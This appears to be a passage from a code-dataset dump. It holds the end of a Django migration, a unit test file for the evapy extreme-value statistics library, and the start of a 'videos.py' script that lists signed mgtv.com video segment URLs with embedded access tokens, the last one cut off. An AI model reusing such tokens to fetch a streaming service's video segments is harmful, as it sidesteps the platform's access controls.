field=models.CharField(blank=True, choices=[(b'HS', b'HSTM Upload'), (b'PT', b'Printed'), (b'AU', b'Authorized'), (b'PD', b'Proofed'), (b'FU', b'Fully Entered'), (b'BD', b'Bulk Data Update')], max_length=2, null=True),
),
migrations.AlterField(
model_name='authority',
name='type_controlled',
field=models.CharField(blank=True, choices=[(b'PE', b'Person'), (b'IN', b'Institution'), (b'TI', b'Time Period'), (b'GE', b'Geographic Term'), (b'SE', b'Serial Publication'), (b'CT', b'Classification Term'), (b'CO', b'Concept'), (b'CW', b'Creative Work'), (b'EV', b'Event'), (b'CR', b'Cross-reference')], help_text=b'Specifies authority type. Each authority thema has its own list of controlled type vocabulary.', max_length=2, null=True, verbose_name=b'type'),
),
migrations.AlterField(
model_name='historicalauthority',
name='type_controlled',
field=models.CharField(blank=True, choices=[(b'PE', b'Person'), (b'IN', b'Institution'), (b'TI', b'Time Period'), (b'GE', b'Geographic Term'), (b'SE', b'Serial Publication'), (b'CT', b'Classification Term'), (b'CO', b'Concept'), (b'CW', b'Creative Work'), (b'EV', b'Event'), (b'CR', b'Cross-reference')], help_text=b'Specifies authority type. Each authority thema has its own list of controlled type vocabulary.', max_length=2, null=True, verbose_name=b'type'),
),
migrations.AlterField(
model_name='historicalperson',
name='type_controlled',
field=models.CharField(blank=True, choices=[(b'PE', b'Person'), (b'IN', b'Institution'), (b'TI', b'Time Period'), (b'GE', b'Geographic Term'), (b'SE', b'Serial Publication'), (b'CT', b'Classification Term'), (b'CO', b'Concept'), (b'CW', b'Creative Work'), (b'EV', b'Event'), (b'CR', b'Cross-reference')], help_text=b'Specifies authority type. Each authority thema has its own list of controlled type vocabulary.', max_length=2, null=True, verbose_name=b'type'),
),
]
b080217603fdc10fea41db1089886e7e327dfe35 | 5,606 | py | Python | tests/test_evstats.py | 4Subsea/evapy | be4f37b73bc22af700b75019dd23f73826e47f39 | [
"MIT"
] | 4 | 2016-06-07T11:06:43.000Z | 2020-04-23T18:42:25.000Z | tests/test_evstats.py | 4Subsea/evapy | be4f37b73bc22af700b75019dd23f73826e47f39 | [
"MIT"
] | 3 | 2016-06-07T11:06:05.000Z | 2016-12-13T19:40:19.000Z | tests/test_evstats.py | 4Subsea/evapy | be4f37b73bc22af700b75019dd23f73826e47f39 | [
"MIT"
] | 1 | 2019-10-05T14:45:54.000Z | 2019-10-05T14:45:54.000Z | import unittest
import numpy as np
from evapy import evstats
class Test__argrelmax(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_simple_find(self):
x = np.array([0., 1., 0., -1., 0., 2.])
calculated = evstats._argrelmax(x)
expected = np.array([False, True, False, False, False, False])
np.testing.assert_array_equal(calculated, expected)
def test_simple_find_none(self):
x = np.array([0., 1., 2., 3., 4., 5.])
calculated = evstats._argrelmax(x)
expected = np.array([False, False, False, False, False, False])
np.testing.assert_array_equal(calculated, expected)
class Test__argupcross(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_simple_find(self):
x = np.array([0., 1., -1., -2., -1., 1., 0.])
calculated = evstats._argupcross(x, x_up=0.)
expected = np.array([True, False, False, False, True, False, False])
np.testing.assert_array_equal(calculated, expected)
def test_simple_find_w_zero(self):
x = np.array([0., 1., 0., -1., -2., -1., 0., 1., 0.])
calculated = evstats._argupcross(x, x_up=0.)
expected = np.array([True, False, False, False, False, False, True,
False, False])
np.testing.assert_array_equal(calculated, expected)
def test_simple_find_w_other(self):
x = np.array([0., 1., 0., -1., -2., -1., 0., 1., 0.]) + 2.
calculated = evstats._argupcross(x, x_up=2.)
expected = np.array([True, False, False, False, False, False, True,
False, False])
np.testing.assert_array_equal(calculated, expected)
def test_simple_find_none(self):
x = np.array([0.1, 1., 2., 3., 4., 5.])
calculated = evstats._argupcross(x, x_up=0.)
expected = np.array([False, False, False, False, False, False])
np.testing.assert_array_equal(calculated, expected)
class Test_argrelmax(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_simple_find(self):
x = np.array([0., 1., 0., -1., 0., 2.])
calculated = evstats.argrelmax(x)
expected = np.array([1])
np.testing.assert_array_equal(calculated, expected)
def test_simple_find_repeat(self):
x = np.array([0., 1., 1., 0., -1., 0., 2.])
calculated = evstats.argrelmax(x)
expected = np.array([1])
np.testing.assert_array_equal(calculated, expected)
def test_simple_find_none(self):
x = np.array([0., 1., 2., 3., 4., 5.])
calculated = evstats.argrelmax(x)
expected = np.array([5])
np.testing.assert_array_equal(calculated, expected)
class Test_argupcross(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_simple_find(self):
x = np.array([-1., 1., -1., -2., -1., 1., 0.])
calculated = evstats.argupcross(x, x_up=0.)
expected = np.array([0., 4])
np.testing.assert_array_equal(calculated, expected)
def test_simple_find_w_zero(self):
x = np.array([0., 1., 0., -1., -2., -1., 0., 1., 0., 1.])
calculated = evstats.argupcross(x, x_up=0.)
expected = np.array([0, 6, 8])
np.testing.assert_array_equal(calculated, expected)
def test_simple_find_touch_below(self):
x = np.array([0., -1., 0., -1.])
calculated = evstats.argupcross(x, x_up=0.)
expected = np.array([0])
np.testing.assert_array_equal(calculated, expected)
def test_simple_find_w_other(self):
x = np.array([0., 1., 0., -1., -2., -1., 0., 1., 0.]) + 2.
calculated = evstats.argupcross(x, x_up=2.)
expected = np.array([0., 6.])
np.testing.assert_array_equal(calculated, expected)
def test_simple_find_none(self):
x = np.array([0.1, 1., 2., 3., 4., 5.])
calculated = evstats.argupcross(x, x_up=0.)
expected = np.array([0.])
np.testing.assert_array_equal(calculated, expected)
class Test_argrelmax_decluster(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_simple_find(self):
x = np.array([0., 1., 0., -1., 0., 2.])
calculated = evstats.argrelmax_decluster(x, x_up=0.)
expected = np.array([1])
np.testing.assert_array_equal(calculated, expected)
def test_simple_find_2(self):
x = np.array([0., 1., 0., -1., 0., 2., 1., -1., 1.])
calculated = evstats.argrelmax_decluster(x, x_up=0.)
expected = np.array([1, 5])
np.testing.assert_array_equal(calculated, expected)
def test_simple_find_decluster(self):
x = np.array([0., 1., 2., 1., 2., 3., 2., 1., 0., 2., -1., 1.])
calculated = evstats.argrelmax_decluster(x, x_up=0.)
expected = np.array([5, 9])
np.testing.assert_array_equal(calculated, expected)
def test_simple_find_none(self):
x = np.array([0.1, 1., 2., 3., 4., 5.])
calculated = evstats.argrelmax_decluster(x)
expected = np.array([5])
np.testing.assert_array_equal(calculated, expected)
def test_find_decluster_below_upcross(self):
x = np.array([0., 1., 2., 1., 2., 3., 2., 1., 0., -1., -2., -1, -2, -1,
0., 1, 0., -1., -2., -1., 0., 1.])
calculated = evstats.argrelmax_decluster(x, x_up=0.)
expected = np.array([5, 15.])
np.testing.assert_array_equal(calculated, expected)
| 34.392638 | 79 | 0.584552 | 779 | 5,606 | 4.042362 | 0.062901 | 0.084471 | 0.058431 | 0.072404 | 0.962845 | 0.956494 | 0.956494 | 0.93744 | 0.926961 | 0.926961 | 0 | 0.046018 | 0.251873 | 5,606 | 162 | 80 | 34.604938 | 0.704816 | 0 | 0 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.150794 | 1 | 0.230159 | false | 0.079365 | 0.02381 | 0 | 0.293651 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 9 |
# videos.py (repo: 2218084076/hotpoor_autoclick_xhs, license: Apache-2.0)
import requests
import os
js_list=["https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/12C0BAD1F6E8CB74C366D11BB43B7051_0_5080_1553_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/D3A269D1FA04321DDEB966FF30A0CF72_5080_10080_2018_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/998790257298087CDA1064D95D9DE2A4_10080_20080_1218_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5J
GMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/0437188846078FD1EDC03CE517E9FDA5_20080_30080_1146_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/FDC7AE1722EB09F161204401405C6054_30080_40080_1483_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16
dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/57AEEAEB63B51BC66598D1DF2AE87A0A_40080_50080_761_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/7E6E3EE972A8E93BF8062CE1C72DDBE3_50080_60080_1360_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/16B9372334927AA99507D3416E7AA269_60080_70080_2055_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7m
RW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/CC8B1AF22C9DB91A5AA44E29EB51B434_70080_80080_1035_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/30F7BF3DAB4CA2D8381FAD8DA79B7A57_80080_90080_607_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~
<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/0EA70DCDDBC0EF961F6269BE21343CC4_90080_100080_1239_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/7B54227ABA6ECD8FDBDC92CE106856AF_100080_110080_1118_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/365CDA9DD4B82B21C20855EC261C3A26_110080_120080_372_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9E
ivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/85EE9B68505943C1F0B05CDDB4AF3912_120080_130080_892_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/667714C2FABA24CC018F3C1A404A3700_130080_140080_1429_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycf
Zhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/F3252DFC4E3A637C082FA34EAA02026B_140080_150080_1302_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&sci